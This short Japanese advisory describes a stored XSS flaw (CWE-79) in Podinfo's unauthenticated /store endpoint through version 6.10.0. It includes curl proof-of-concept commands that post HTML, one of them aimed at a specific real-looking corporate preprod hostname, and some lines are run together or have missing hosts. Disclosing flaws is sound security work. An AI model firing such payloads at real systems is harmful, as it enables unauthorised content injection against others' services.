
Podinfo(KubernetesマイクロサービスをデモンストレーションするWebアプリケーション)において、セキュリティ脆弱性(CWE-79)が特定されました。/store機能では、認証されていないユーザーが任意のHTML/JSコンテンツをアップロードでき、格納型XSSを引き起こします。
/store<= 6.10.0curl -X POST https://target/store -H "Content-Type: text/html" -d '<h1>CVE-2025-70849</h1>'
curl -X POST https://podinfo.xcr.preprod55.prepd.eastus.kaas.sws.siemens.com/store -H "Content-Type: text/html" -d '<h1>CVE-2025-70849</h1>'

返されたハッシュにアクセスする: https:///store/